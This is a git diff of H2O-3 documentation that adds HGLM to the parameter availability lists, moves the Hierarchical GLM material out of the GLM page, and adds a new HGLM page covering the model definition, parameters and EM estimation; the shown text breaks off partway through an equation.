ANOVAGLM, ModelSelection - Hyperparameter: no Description diff --git a/h2o-docs/src/product/data-science/algo-params/validation_frame.rst b/h2o-docs/src/product/data-science/algo-params/validation_frame.rst index 4725a02883be..66b9ce8a4a72 100644 --- a/h2o-docs/src/product/data-science/algo-params/validation_frame.rst +++ b/h2o-docs/src/product/data-science/algo-params/validation_frame.rst @@ -1,7 +1,7 @@ ``validation_frame`` -------------------- -- Available in: GBM, DRF, Deep Learning, GLM, GAM, PCA, GLRM, Naïve-Bayes, K-Means, Stacked Ensembles, AutoML, 
XGBoost, Uplift DRF +- Available in: GBM, DRF, Deep Learning, GLM, GAM, HGLM, PCA, GLRM, Naïve-Bayes, K-Means, Stacked Ensembles, AutoML, XGBoost, Uplift DRF, ModelSelection - Hyperparameter: no Description diff --git a/h2o-docs/src/product/data-science/algo-params/weights_column.rst b/h2o-docs/src/product/data-science/algo-params/weights_column.rst index 3ecbda1ca3b6..f1a64286915b 100644 --- a/h2o-docs/src/product/data-science/algo-params/weights_column.rst +++ b/h2o-docs/src/product/data-science/algo-params/weights_column.rst @@ -1,7 +1,7 @@ ``weights_column`` ------------------ -- Available in: GBM, DRF, Deep Learning, GLM, GAM, AutoML, XGBoost, CoxPH, Stacked Ensembles, AdaBoost +- Available in: GBM, DRF, Deep Learning, GLM, GAM, HGLM, AutoML, XGBoost, CoxPH, Stacked Ensembles, AdaBoost, ANOVAGLM, ModelSelection - Hyperparameter: no Description diff --git a/h2o-docs/src/product/data-science/algo-params/x.rst b/h2o-docs/src/product/data-science/algo-params/x.rst index 98e27e8a5bc9..06020ab907a0 100644 --- a/h2o-docs/src/product/data-science/algo-params/x.rst +++ b/h2o-docs/src/product/data-science/algo-params/x.rst @@ -1,7 +1,7 @@ ``x`` ----- -- Available in: GBM, DRF, Deep Learning, GLM, GAM, PCA, GLRM, Naïve-Bayes, K-Means, Stacked Ensembles, AutoML, XGBoost, Uplift DRF, AdaBoost +- Available in: GBM, DRF, Deep Learning, GLM, GAM, HGLM, PCA, GLRM, Naïve-Bayes, K-Means, Stacked Ensembles, AutoML, XGBoost, Uplift DRF, AdaBoost, Decision Tree, ANOVAGLM, ModelSelection - Hyperparameter: no Description diff --git a/h2o-docs/src/product/data-science/algo-params/y.rst b/h2o-docs/src/product/data-science/algo-params/y.rst index 82c7276707d1..46c1f07c9061 100644 --- a/h2o-docs/src/product/data-science/algo-params/y.rst +++ b/h2o-docs/src/product/data-science/algo-params/y.rst @@ -1,6 +1,6 @@ ``y`` ----- -- Available in: GBM, DRF, Deep Learning, GLM, GAM, Naïve-Bayes, Stacked Ensembles, AutoML, XGBoost, Aggregator, Uplift DRF, AdaBoost +- Available in: GBM, DRF, Deep Learning, GLM, GAM, HGLM, Naïve-Bayes, Stacked Ensembles, AutoML, XGBoost, Aggregator, Uplift DRF, AdaBoost, Decision Tree, ANOVAGLM, ModelSelection - Hyperparameter: no diff --git a/h2o-docs/src/product/data-science/glm.rst b/h2o-docs/src/product/data-science/glm.rst index 161d57698fdc..7c03cea4d520 100644 --- a/h2o-docs/src/product/data-science/glm.rst +++ b/h2o-docs/src/product/data-science/glm.rst @@ -71,18 +71,6 @@ Algorithm-specific parameters - `upload_custom_metric `__: Upload a custom metric into a running H2O cluster. -HGLM parameters -''''''''''''''' - -- `HGLM `__: If enabled, then an HGLM model will be built. If disabled (default), then a GLM model will be built. - -- **rand_link**: The link function for random component in HGLM specified as an array. Available options include ``identity`` and ``family_default``. - -- `random_columns `__: An array of random column indices to be used for ``HGLM``. - -- **startval**: The initial starting values for fixed and randomized coefficients in ``HGLM`` specified as a double array. - - Shared GLM family parameters '''''''''''''''''''''''''''' @@ -101,7 +89,12 @@ Shared GLM family parameters :scale: 5% :align: middle -**GLM Family**: |GAM| `Generalized Additive Models `__ (GAM) |MS| `ModelSelection `__ |ANOVA| `ANOVA GLM `__ +.. 
|HGLM| image:: ../images/HGLM.png + :alt: HGLM + :scale: 5% + :align: middle + +**GLM Family**: |GAM| `Generalized Additive Models `__ (GAM) |MS| `ModelSelection `__ |ANOVA| `ANOVA GLM `__ |HGLM| `Hierarchical Generalized Linear Model `__ (HGLM) - `alpha `__: |GAM| |MS| |ANOVA| Specify the regularization distribution between L1 and L2. A value of ``1`` produces LASSO regression; a value of ``0`` produces Ridge regression. The default value of ``alpha`` is ``0`` when ``SOLVER = 'L-BFGS'``; otherwise it is ``0.5`` to specify a mixing between LASSO and Ridge regression. @@ -115,7 +108,7 @@ Shared GLM family parameters - `compute_p_values `__: |GAM| |MS| |ANOVA| Request computation of p-values. P-values can be computed with or without regularization. Setting ``remove_collinear_columns`` is recommended. H2O will return an error if p-values are requested and there are collinear columns and the ``remove_collinear_columns`` flag is not enabled. Note that this option is not available for ``family="multinomial"`` or ``family="ordinal"``; the ``IRLSM`` solver is required. This option defaults to ``False`` (disabled). -- `family `__: |GAM| |MS| |ANOVA| Specify the model type. +- `family `__: |GAM| |MS| |ANOVA| |HGLM| Specify the model type. - If the family is ``gaussian``, the response must be numeric (**Real** or **Int**). - If the family is ``binomial``, the response must be categorical 2 levels/classes or binary (**Enum** or **Int**). @@ -175,7 +168,7 @@ Shared GLM family parameters - `objective_epsilon `__: |GAM| If the objective value is less than this threshold, then the model is converged. If ``lambda_search=True``, then this value defaults to ``.0001``. If ``lambda_search=False`` and ``lambda`` is equal to zero, then this value defaults to ``.000001``. For any other value of ``lambda``, the default value of ``objective_epsilon`` is set to ``.0001``. The default value is ``-1``. -- `plug_values `__: |GAM| |MS| |ANOVA| (Applicable only if ``missing_values_handling="PlugValues"``) Specify a single row frame containing values that will be used to impute missing values of the training/validation frame. +- `plug_values `__: |GAM| |MS| |ANOVA| |HGLM| (Applicable only if ``missing_values_handling="PlugValues"``) Specify a single row frame containing values that will be used to impute missing values of the training/validation frame. - `prior `__: |GAM| |MS| |ANOVA| Specify prior probability for :math:`p(y==1)`. Use this parameter for logistic regression if the data has been sampled and the mean of response does not reflect reality. This value defaults to ``-1`` and must be a value in the range (0,1). @@ -183,7 +176,7 @@ Shared GLM family parameters - `remove_collinear_columns `__: |GAM| |MS| Specify whether to automatically remove collinear columns during model-building. When enabled, collinear columns will be dropped from the model and will have 0 coefficient in the returned model. This option defaults to ``False`` (disabled). -- **score_iteration_interval**: |MS| Perform scoring for every ``score_iteration_interval`` iteration. This option defaults to ``-1``. +- **score_iteration_interval**: |MS| |HGLM| Perform scoring for every ``score_iteration_interval`` iteration. This option defaults to ``-1``. - `solver `__: |GAM| |MS| |ANOVA| Specify the solver to use. One of: @@ -954,247 +947,6 @@ While not converged: i. 
Theta :math:`\gets` Maximum Likelihood estimate using Newton’s method with learning rate estimated using Golden section search -Hierarchical GLM -~~~~~~~~~~~~~~~~ - -Introduced in 3.28.0.1, Hierarchical GLM (HGLM) fits generalized linear models with random effects, where the random effect can come from a conjugate exponential-family distribution (for example, Gaussian). HGLM allows you to specify both fixed and random effects, which allows fitting correlated to random effects as well as random regression models. HGLM can be used for linear mixed models and for generalized linear mixed models with random effects for a variety of links and a variety of distributions for both the outcomes and the random effects. - -**Note**: The initial release of HGLM supports only the Gaussian family and random family. - -Gaussian Family and Random Family in HGLM -''''''''''''''''''''''''''''''''''''''''' - -To build an HGLM, we need the hierarchical log-likelihood (h-likelihood) function. The h-likelihood function can be expressed as (equation 1): - -.. math:: - - h(\beta, \theta, u) = \log(f (y|u)) + \log (f(u)) - -for fixed effects :math:`\beta`, variance components :math:`\theta`, and random effects :math:`u`. - -A standard linar mixed model can be expressed as (equation 2): - -.. math:: - - y = X\beta + Zu + e - -where - - - :math:`e \text ~ N(0, I_n, \delta_e^2), u \text ~ N(0, I_k, \delta_u^2)` - - :math:`e, u` are independent, and :math:`u` represents the random effects - - :math:`n` is the number of i.i.d observations of :math:`y` with mean :math:`0` - - :math:`q` is the number of values :math:`Z` can take - -Then rewriting equation 2 as :math:`e = X\beta + Zu - y` and derive the h-likelihood as: - -.. figure:: ../images/h-likelihood.png - :align: center - -where :math:`C_1 = - \frac{n}{2} \log(2\pi), C_2 = - \frac{q}{2} \log(2\pi)` - -In principal, the HGLM model building involves the following main steps: - -1. Set the initial values to :math:`\delta_u^2, \delta_e^2, u, \beta` -2. Estimate the fixed (:math:`\beta`) and random effects (:math:`u`) by solving for :math:`\frac{\partial h}{\partial \beta} = 0, \frac{\partial h}{\partial u} = 0` -3. Estimate variance components using the adjusted profile likelihood: - - .. math:: - - h_p = \big(h + \frac{1}{2} log \big| 2 \pi D^{-1}\big| \big)_{\beta=\hat \beta, u=\hat u} - - and solving for - - .. math:: - - \frac{\partial h_p}{\partial \theta} = 0 - - Note that :math:`D` is the matrix of the second derivatives of :math:`h` around :math:`\beta = \hat \beta, u = \hat u, \theta = (\delta_u^2, \delta_e^2)`. - -H2O Implementation -'''''''''''''''''' - -In reality, Lee and Nelder (see References) showed that linear mixed models can be fitted using a hierarchy of GLM by using an augmented linear model. The linear mixed model will be written as: - -.. math:: - - y = X\beta + Zu + e \\ - v = ZZ^T\sigma_u^2 + R\sigma_e^2 - -where :math:`R` is a diagonal matrix with elements given by the estimated dispersion model. The dispersion model refers to the variance part of the fixed effect model with error :math:`e`. There are cases where the dispersion model is modeled itself as :math:`exp(x_d, \beta_d)`. However, in our current version, the variance is just a constant :math:`\sigma_e^2`, and hence :math:`R` is just a scalar value. It is initialized to be the identity matrix. The model can be written as an augmented weighted linear model: - -.. math:: - - y_a = T_a \delta + e_a - -where - -.. 
figure:: ../images/hglm_augmentation.png - :align: center - -Note that :math:`q` is the number of columns in :math:`Z, 0_q` is a vector of :math:`q` zeroes, :math:`I_q` is the :math:`qxq` identity matrix. The variance-covariance matrix of the augmented residual matrix is - -.. figure:: ../images/hglm_variance_covariance.png - :align: center - -Fixed and Random Coefficients Estimation -'''''''''''''''''''''''''''''''''''''''' - -The estimates for :math:`\delta` from weighted least squares are given by solving - -.. math:: - - T_a^T W^{-1} T_a \delta=T_a^T W^{-1} y_a - -where - -.. math:: - - W= V(e_a ) - -The two variance components are estimated iteratively by applying a gamma GLM to the residuals :math:`e_i^2,u_i^2`. Because we are not using a dispersion model, there is only an intercept terms in the linear predictors. The leverages :math:`h_i` for these models are calculated from the diagonal elements of the hat matrix: - -.. math:: - - H_a=T_a (T_a^T W^{-1} T_a )^{-1} T_a^T W^{-1} - -Estimation of Fixed Effect Dispersion Parameter/Variance -'''''''''''''''''''''''''''''''''''''''''''''''''''''''' - -A gamma GLM is used to fit the dispersion part of the model with response -:math:`y_{d,i}=(e_i^2)⁄(1-h_i )` where :math:`E(y_d )=u_d` and :math:`u_d≡\phi` (i.e., :math:`\delta_e^2` for a Gaussian response). The GLM model for the dispersion parameter is then specified by the link function :math:`g_d (.)` and the linear predictor :math:`X_d \beta_d` with prior weights for :math:`(1-h_i )⁄2` for :math:`g_d (u_d )=X_d \beta_d`. Because we are not using a dispersion model, :math:`X_d \beta_d` will only contain the intercept term. - -Estimation of Random Effect Dispersion Parameter/Variance -''''''''''''''''''''''''''''''''''''''''''''''''''''''''' - -Similarly, a gamma GLM is fitted to the dispersion term :math:`alpha` (i.e., :math:`\delta_e^2` for a GLM) for the random effect :math:`v`, with :math:`y_\alpha,j = u_j^2⁄(1-h_{n+j}), j=1,2,…,q` and :math:`g_\alpha (u_\alpha )=\lambda`, where the prior weights are :math:`(1-h_{n+j} )⁄2`, and the estimated dispersion term for the random effect is given by :math:`\hat \alpha = g_α^{-1}(\hat \lambda)`. - -Fitting Algorithm Overview -'''''''''''''''''''''''''' - -The following fitting algorithm from "Generalized linear models with random effects" (Y. Lee, J. A. Nelder and Y. Pawitan; see References) is used to build our HGLM. Let :math:`n` be the number of observations and :math:`k` be the number of levels in the random effect. The algorithm that was implemented here at H2O will perform the following: - -1. Initialize starting values either from user by setting parameter startval or by the system if startval is left unspecified. -2. Construct an augmented model with response :math:`y_{aug}= {y \choose {E(u)}}`. -3. Use a GLM to estimate :math:`\delta={\beta \choose u}` given the dispersion :math:`\phi` and :math:`\lambda`. Save the deviance components and leverages from the fitted model. -4. Use a gamma GLM to estimate the dispersion parameter for :math:`\phi` (i.e. :math:`\delta_e^2` for a Gaussian response). -5. Use a similar GLM as in step 4 to estimate :math:`\lambda` from the last :math:`k` deviance components and leverages obtained from the GLM in step 3. -6. Iterate between steps 3-5 until convergence. Note that the convergence measure here is either a timeout event or the following condition has been met: :math:`\frac {\Sigma_i{(\text{eta}. i - \text{eta}.o)^2}} {\Sigma_i(\text{eta}.i)^2 \text{<} 1e - 6}`. 
- -A timeout event can be defined as the following: - -1. Maximum number of iterations have been reached -2. Model building run time exceeds what is specified in ``max_runtime_secs`` -3. A user has clicked on stop model button or similar from Flow. - -For families and random families other than Gaussian, link functions are used to translate from the linear space to the model the mean output. - -Linear Mixed Model with Correlated Random Effect -'''''''''''''''''''''''''''''''''''''''''''''''' - -Let :math:`A` be a matrix with known elements that describe the correlation among the random effects. The model is now given by: - -.. figure:: ../images/hglm_linear_mixed_model1.png - :align: center - -where :math:`N` is normal distribution and :math:`MVN` is multi-variable normal. This can be easily translated to: - -.. figure:: ../images/hglm_linear_mixed_model2.png - :align: center - -where :math:`Z^* = ZL` and :math:`L` is the Cholesky factorization of :math:`A`. Hence, if you have correlated random effects, you can first perform the transformation to your data before using our HGLM implementation here. - -HGLM Model Metrics -'''''''''''''''''' - -H2O provides the following model metrics at the end of each HGLM experiment: - -- fixef: fixed effects coefficients -- ranef: random effects coefficients -- randc: vector of random column indices -- varfix: dispersion parameter of the mean model -- varranef: dispersion parameter of the random effects -- converge: true if algorithm has converge, otherwise false -- sefe: standard errors of fixed effects -- sere: standard errors of random effects -- dfrefe: deviance degrees of freedom for the mean part of model -- sumvc1: estimates and standard errors of linear predictor in the dispersion model -- summvc2: estimates and standard errors of the linear predictor for the dispersion parameter of the random effects -- likelihood: if ``calc_like`` is true, the following four values are returned: - - - hlik: log-h-likelihood; - - pvh: adjusted profile log-likelihood profiled over the random effects; - - pbvh: adjusted profile log-likelihood profiled over fixed and random effects; - - caic: conditional AIC. - -- bad: row index of the most influential observation. - -Mapping of Fitting Algorithm to the H2O-3 Implementation -'''''''''''''''''''''''''''''''''''''''''''''''''''''''' - -This mapping is done in four steps: - -1. Initialize starting values by the system. -2. Estimate :math:`\delta =` :math:`\beta \choose u`. -3. Estimate :math:`\delta_e^2(\text {tau})`. -4. Estimate :math:`\delta_u^2(\text {phi})`. - -**Step 1**: Initialize starting values by the system. - -Following the implementation from R, when a user fails to specify starting values for psi, :math:`\beta`, :math:`\mu`, :math:`\delta_e^2`, :math:`\delta_u^2`, we will do it for the users as follows: - - 1. A GLM model is built with just the fixed columns and response. - 2. Next init_sig_e(:math:`\delta_e^2`)/tau is set to 0.6*residual_deviance()/residual_degrees_of_freedom(). - 3. init_sig_u(:math:`\delta_u^2`) is set to 0.66*init_sig_e. - 4. For numerical stability, we restrict the magnitude to init_sig_e and init_sig_u to >= 0.1. - 5. Set phi = vector of length number of random columns of value init_sig_u/(number of random columns). - 6. Set :math:`\beta` to the GLM model coefficients, :math:`\mu` to be a zero vector. - 7. Set psi to be a zero vector. - -**Step 2**: Estimate :math:`\delta =` :math:`\beta \choose u`. 
- -Given the current values of :math:`\delta_e^2, \delta_u^2`, we will solve for :math:`\delta =` :math:`\beta \choose u`. Instead of solving :math:`\delta` from :math:`T_a^T W^{-1} T_a \delta=T_a^T W^{-1} y_a`, a different set of formulae are used. A loop is used to solve for the coefficients: - - 1. The following variables are generated: - - - :math:`v.i= g_r^{-1} (u_i)` where :math:`u_i` are the random coefficients of the random effects/columns and :math:`g_r^{-1}` can be considered as the inverse link function. - - :math:`tau` is a vector of length number of data containing init.sig.e; - - :math:`eta.i=X_i \beta+offset` and store the previous :math:`eta.i` as :math:`eta.o`. - - :math:`mu.i=g^{-1} (eta.i)`. - - dmu_deta is derivative of :math:`g^{-1} (eta.i)` with respect to :math:`eta.i`, which is 1 for identity link. - - :math:`z_i=eta.i-offset+(y_i-mu.i)/\text {dmu_deta}` - - :math:`zmi= \text{psi}` - - :math:`augZ =` :math:`zi \choose zmi`. - - du_dv is the derivative of :math:`g_r^{-1} (u_i)` with respect to :math:`v.i.` Again, for identity link, this is 1. - - The weight :math:`W =` :math:`wdata \choose wpsi` where :math:`wdata = \frac {d \text{mu_deta}^2}{\text {prior_weight*family}\$\text{variance}(mu.i)*tau}` and :math:`wpsi = \frac {d \text{u_dv}^2}{\text {prior_weight*family}\$\text{variance(psi)*phi}}` - - 2. Finally the following formula is used to solve for the parameters: :math:`augXZ \cdot \delta=augZW` where :math:`augXZ=T_a \cdot W` and :math:`augZW=augZ \cdot W`: - - - Use QR decomposition to augXZ and obtain: :math:`QR \delta = augZW`. - - Use backward solve to obtain the coefficients :math:`\delta` from :math:`R \delta = Q^T augZW`. - - Calculate :math:`hv=\text{rowsum}(Q)` of length n+number of expanded and store in returnFrame. - - Calculate :math:`dev =` :math:`prior weight*(y_i-mu.i)^2 \choose (psi -u_i )^2` of length n+number of expanded random columns and store in returnFrame. - - Calculate :math:`resid= \frac {(y-mu.i)} {\sqrt \frac {sum(dev)(1-hv)}{n-p}}` of length n and store in returnFrame. - - Go back to step 1 unless :math:`\Sigma_i(eta.i-eta.o)^2 / \Sigma_i(eta.i)^2<1e-6` or a timeout event has occurred. - -**Step 3**: Estimate :math:`\delta_e^2(\text {tau})` - -With the newly estimated fixed and random coefficients, we will estimate the dispersion parameter for the fixed effects/columns by building a gamma GLM: - - 1. Generate a training frame with constant predictor column of 1 to force glm model to generate only the intercept term: - - - Response column as :math:`dev/(1-hv)`. - - Weight column as :math:`(1-hv)/2`. - - Predictor column of ones. - - The length of the training frame is the number of data rows. - - 2. Build a gamma GLM with ``family=gamma`` and ``link=log``. - 3. Set :math:`tau = \text {exp (intercept value)}`. - 4. Assign estimation standard error and sigma from the GLM standard error calculation for coefficients. - -**Step 4**: Estimate :math:`\delta_u^2(\text {phi})`. - -Again, a gamma GLM model is used here. In addition, the error estimates are generated for each random column. Exactly the same steps are used here as in Step 3. The only difference is that we are looking at the :math:`dev,hv` corresponding to the expanded random columns/effects. - .. 
_regularization: Regularization diff --git a/h2o-docs/src/product/data-science/hglm.rst b/h2o-docs/src/product/data-science/hglm.rst new file mode 100644 index 000000000000..1a98e63ad3ca --- /dev/null +++ b/h2o-docs/src/product/data-science/hglm.rst @@ -0,0 +1,392 @@ +Hierarchical Generalized Linear Model (HGLM) +============================================ + +Introduction +------------ + +Hierarchical linear models (HLM) are used in situations where measurements are taken within clusters of data and there are cluster-level effects that can affect the coefficient values of the GLM. + +For instance, if we measure the performance of students from multiple schools along with other predictors such as family annual income, student health, and school type (public, private, religious, etc.), we would suspect that students from the same school will have more similar performances than students from different schools. Therefore, we can denote a coefficient for predictor :math:`m \text{ as } \beta_{mj}` where :math:`j` denotes the school index in our example. :math:`\beta_{0j}` denotes the intercept associated with school :math:`j`. + +A level-1 HLM can be expressed as: + +.. math:: + + y_{ij} = \beta_{0j} + \sum_{m=1}^{p-1} x_{mij} \beta_{mj} + \varepsilon_{ij} \quad \text{ equation 1} + +The level-2 model can be expressed as: + +.. math:: + + \beta_{0j} = \beta_{00} + u_{0j}, \beta_{mj} = \beta_{m0} + u_{mj} \quad \text{ equation 2} + +where: + +- :math:`j(=[1,2,...,J])` denotes the cluster (level-2 variable) the measurement is taken from (e.g. the school index); +- :math:`i(=1,2,...,n_j)` denotes the data index taken from within cluster :math:`j`; +- :math:`\beta_{00}` is the fixed intercept; +- :math:`\beta_{0j}` is the random intercept; +- :math:`\beta_{m0}` is the fixed coefficient for predictor :math:`m`; +- The dimension of fixed effect coefficients is :math:`p` which includes the intercept; +- :math:`u_{mj}` is the random coefficient for predictor :math:`m`. For predictors without a random coefficient, :math:`u_{mj} = 0`; +- The dimension of the random effect coefficients is :math:`q` which can include the intercept. Note that :math:`q \leq p`; +- :math:`\varepsilon_{ij} \sim N(0, \delta_e^2)`; +- :math:`u_{mj} \sim N(0, \delta_u^2)`; +- :math:`\varepsilon_{ij}, u_{mj}` are independent; +- :math:`u_{mj}, u_{m^{'}j}` are independent if :math:`m \neq m^{'}`. + +Substituting *equation 2* into *equation 1* gives the combined mixed model :math:`y_{ij} = \beta_{00} + \sum_{m=1}^{p-1} x_{mij} \beta_{m0} + u_{0j} + \sum_{m=1}^{p-1} x_{mij} u_{mj} + \varepsilon_{ij}`, which separates the fixed effects from the random effects. We need to solve for the following parameters: :math:`\beta_{00}, \beta_{0j}, \beta_{m0}, u_{mj}, \delta_e^2, \delta_u^2`. + +Defining an HGLM model +---------------------- +Parameters are optional unless specified as *required*. + +Algorithm-specific parameters +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +- **em_epsilon**: (Only available for the EM method) Converge if beta/ubeta/tmat/tauEVar changes by less than this epsilon, measured in the L-infinity norm (defaults to ``0.001``). + +- **gen_syn_data**: If enabled, it will generate synthetic HGLM data with the fixed coefficients specified in ``initial_fixed_effects`` and the random coefficients taken from ``initial_random_effects`` (or, if unspecified, generated randomly). In particular, it will generate the following output: :math:`Y_j = A_{fj} \theta_f + A_{rj} \theta_{rj} + r_j`. The Gaussian noise is generated with the variance specified in ``tau_e_var_init``. If the random coefficients are to be randomly generated, they are drawn from a Gaussian distribution with the variance specified in ``tau_u_var_init``. 
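+
+  For illustration only, the following is a minimal NumPy sketch of this data-generating process (it is not H2O's implementation; the dimensions and values are invented for the example):
+
+  .. code-block:: python
+
+     import numpy as np
+
+     rng = np.random.default_rng(42)
+     J, n_j, p, q = 5, 50, 3, 2                         # level-2 units, rows per unit, dims
+     theta_f = np.array([0.5, -1.0, 2.0])               # fixed effects (initial_fixed_effects)
+     tau_u, tau_e = 0.08, 0.05                          # tau_u_var_init, tau_e_var_init
+
+     Y = []
+     for j in range(J):
+         A_f = rng.normal(size=(n_j, p))                # level-1 predictors A_fj
+         A_r = A_f[:, :q]                               # columns carrying random effects A_rj
+         theta_r = rng.normal(0.0, np.sqrt(tau_u), q)   # random effects theta_rj ~ N(0, tau_u)
+         r = rng.normal(0.0, np.sqrt(tau_e), n_j)       # residual noise r_j ~ N(0, tau_e)
+         Y.append(A_f @ theta_f + A_r @ theta_r + r)    # Y_j = A_fj theta_f + A_rj theta_rj + r_j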
+ +- **group_column**: Specify the name of the categorical level-2 variable that is used to generate the groups in HGLM (defaults to ``None``). + +- **initial_fixed_effects**: An array that contains the initial values of the fixed effects coefficients (defaults to ``None``). + +- **initial_random_effects**: An H2OFrame ID that contains the initial values of the random effects coefficients. The row names should be the random coefficient names (defaults to ``None``). + + .. note:: + + If you aren't sure what the random coefficient names are, then build the HGLM model with ``max_iterations=0`` and check out the model output field ``random_coefficient_names``. The number of rows of this frame should equal the number of level-2 units (check out the model output field ``group_column_names``; the number of rows should equal its length). + +- **initial_t_matrix**: An H2OFrame ID that contains the initial values of the T matrix. It should be a symmetric positive definite matrix (defaults to ``None``). + +- **method**: Specify the estimation method used to obtain the fixed and random coefficients as well as the various variances (defaults to ``"em"``). + +- `random_columns `__: An array of random column names from which random effects coefficients will be generated in the model building process. + +- `rand_family `__: Specify the distribution of the random effects. Currently only ``rand_family="gaussian"`` is supported. + +- **random_intercept**: If enabled, will generate a random intercept as part of the random effects coefficients (defaults to ``True``). + +- **tau_e_var_init**: Initial variance estimate of the random noise (residual noise). If set, this value should be > 0.0. If not set, this will be randomly set during the model building process (defaults to ``0.0``). + +- **tau_u_var_init**: Initial variance estimate of the random effects. If set, this value should be > 0.0. If not set, this will be randomly set during the model building process (defaults to ``0.0``). + +Common parameters +~~~~~~~~~~~~~~~~~ + +- `custom_metric_func `__: Specify a custom evaluation function. + +- `ignore_const_cols `__: Enable this option to ignore constant training columns, since no information can be gained from them. This option defaults to ``True`` (enabled). + +- `ignored_columns `__: (Python and Flow only) Specify the column or columns to be excluded from the model. In Flow, click the checkbox next to a column name to add it to the list of columns excluded from the model. To add all columns, click the **All** button. To remove a column from the list of ignored columns, click the X next to the column name. To remove all columns from the list of ignored columns, click the **None** button. To search for a specific column, type the column name in the **Search** field above the column list. To only show columns with a specific percentage of missing values, specify the percentage in the **Only show columns with more than 0% missing values** field. To change the selections for the hidden columns, use the **Select Visible** or **Deselect Visible** buttons. + +- `max_iterations `__: Specify the number of training iterations. This option defaults to ``-1``. + +- `max_runtime_secs `__: Maximum allowed runtime in seconds for model training. Use ``0`` (default) to disable. + +- `missing_values_handling `__: Specify how to handle missing values. One of: ``Skip``, ``MeanImputation`` (default), or ``PlugValues``. + +- `model_id `__: Specify a custom name for the model to use as a reference. 
By default, H2O automatically generates a destination key. + +- `offset_column `__: Specify a column to use as the offset; the value cannot be the same as the value for the ``weights_column``. + + .. note:: + + Offsets are per-row "bias values" that are used during model training. For Gaussian distributions, they can be seen as simple corrections to the response (``y``) column. Instead of learning to predict the response (y-row), the model learns to predict the (row) offset of the response column. For other distributions, the offset corrections are applied in the linearized space before applying the inverse link function to get the actual response values. + +- `score_each_iteration `__: Enable this option to score during each iteration of the model training. This option defaults to ``False`` (disabled). + +- `seed `__: Specify the random number generator (RNG) seed for algorithm components dependent on randomization. The seed is consistent for each H2O instance so that you can create models with the same starting conditions in alternative configurations. This option defaults to ``-1`` (time-based random number). + +- `training_frame `__: *Required* Specify the dataset used to build the model. **NOTE**: In Flow, if you click the **Build a model** button from the ``Parse`` cell, the training frame is entered automatically. + +- `validation_frame `__: Specify the dataset used to evaluate the accuracy of the model. + +- `weights_column `__: Specify a column to use for the observation weights, which are used for bias correction. The specified ``weights_column`` must be included in the specified ``training_frame``. + + *Python only*: To use a weights column when passing an H2OFrame to ``x`` instead of a list of column names, the specified ``training_frame`` must contain the specified ``weights_column``. + + .. note:: + + Weights are per-row observation weights and do not increase the size of the data frame. This is typically the number of times a row is repeated, but non-integer values are supported as well. During training, rows with higher weights matter more due to the larger loss function pre-factor. + +- `x `__: Specify a vector containing the names or indices of the predictor variables to use when building the model. If ``x`` is missing, then all columns except ``y`` are used. + +- `y `__: *Required* Specify the column to use as the dependent variable. + + - For a regression model, this column must be numeric (**Real** or **Int**). + - For a classification model, this column must be categorical (**Enum** or **String**). If the family is ``Binomial``, the dataset cannot contain more than two levels. + + +Estimation of parameters using maximum likelihood estimation via EM +-------------------------------------------------------------------- + +The Expectation-Maximization (EM) algorithm addresses the problem of maximizing the likelihood by conceiving this as a problem with missing data. + +Model setup +~~~~~~~~~~~ + +Consider a combined model for each unit :math:`j`: + +.. math:: + + Y_j = A_{fj} \theta_f + A_{rj} \theta_{rj} + r_j, \theta_{rj} \sim N(0,T_j), r_j \sim N(0, \sigma^2I) \quad \text{ equation 6} + +where: + +- :math:`Y_j \text{ is the } n_j` by 1 vector of outcomes for unit :math:`j`; +- :math:`A_{fj} = \begin{bmatrix} x^T_{j1} \\ x^T_{j2} \\ x^T_{j3} \\ \vdots \\ x^T_{jn_j} \\\end{bmatrix}` is a known :math:`n_j \text{ by } p` matrix of level-1 predictors and :math:`x_{ji} = \begin{bmatrix} x^1_{ji} \\ x^2_{ji} \\ \vdots \\ x^{p-1}_{ji} \\ 1 \\\end{bmatrix}`; + + .. 
note:: + + In general, you can place the intercept at the beginning or the end of each row of data, but we chose to put it at the end for our implementation. + +- :math:`\theta_f \text{ is a } p` by 1 vector of fixed coefficients; +- :math:`A_{rj}` is usually denoted by :math:`Z_{rj} \text{ where } Z_{rj} = \begin{bmatrix} z^T_{j1} \\ z^T_{j2} \\ z^T_{j3} \\ \vdots \\ z^T_{jn_j} \\\end{bmatrix}`; + + .. note:: + + We included a term for the random intercept here. However, there are cases where we do not have a random intercept, and the last element of 1 will not be there for :math:`z_{ji}`. + +- :math:`\theta_{rj}` represents the random coefficient and is a :math:`q` by 1 vector; +- :math:`r_j \text{ is an } n_j` by 1 vector of level-1 residual noise assumed multivariate normal in distribution with 0 mean vector and covariance matrix :math:`\sigma^2 I_{n_j \times n_j}`, where :math:`I_{n_j \times n_j}` is the :math:`n_j \text{ by } n_j` identity matrix; +- :math:`j` denotes the level-2 units where :math:`j = 1,2, \cdots , J`; +- :math:`T_j` is a symmetric positive definite matrix of size :math:`q \text{ by } q`. We assume that :math:`T_j` is the same for all :math:`j = 1,2, \cdots , J`, and it is kept symmetric positive definite throughout the whole model building process. + +M-step +~~~~~~ + +EM conceives of :math:`Y_j` as the observed data with :math:`\theta_{rj}` as the missing data. Therefore, the complete data are :math:`(Y_j, \theta_{rj}), j=1, \cdots, J \text{ while } \theta_f, \sigma^2, \text{ and } T_j` are the parameters that need to be estimated. If the complete data were observed, finding the ML estimates would be simple. To estimate :math:`\theta_f`, subtract :math:`A_{rj} \theta_{rj}` from both sides of *equation 6*, yielding: + +.. math:: + + Y_j - A_{rj} \theta_{rj} = A_{fj} \theta_f + r_j \quad \text{ equation 7} + +Next, multiply *equation 7* by :math:`A^T_{fj}` and sum across the level-2 units :math:`j`. Note that :math:`\sum^J_{j=1} A^T_{fj} r_j \approx 0`. Re-arrange the terms and you will get *equation 8*, which is also the ordinary least squares (OLS) estimate: + +.. math:: + + \hat{\theta_f} = \Big( \sum^J_{j=1} A^T_{fj} A_{fj} \Big)^{-1} \sum^J_{j=1} A^T_{fj} (Y_j - A_{rj} \theta_{rj}) \quad \text{ equation 8} + +Next, ML estimators for :math:`T_j` and :math:`\sigma^2` are straightforward: + +.. math:: + + \hat{T_j} = J^{-1} \sum^J_{j=1} \theta_{rj} \theta^T_{rj} \quad \text{ equation 9} + +.. math:: + + \hat{\sigma^2} = N^{-1} \sum^J_{j=1} \hat{r^T_j} \hat{r_j} = N^{-1} \sum^J_{j=1} \big( Y_j - A_{fj} \hat{\theta_f} - A_{rj} \theta_{rj} \big)^T \big( Y_j - A_{fj} \hat{\theta_{f}} - A_{rj} \theta_{rj} \big) \quad 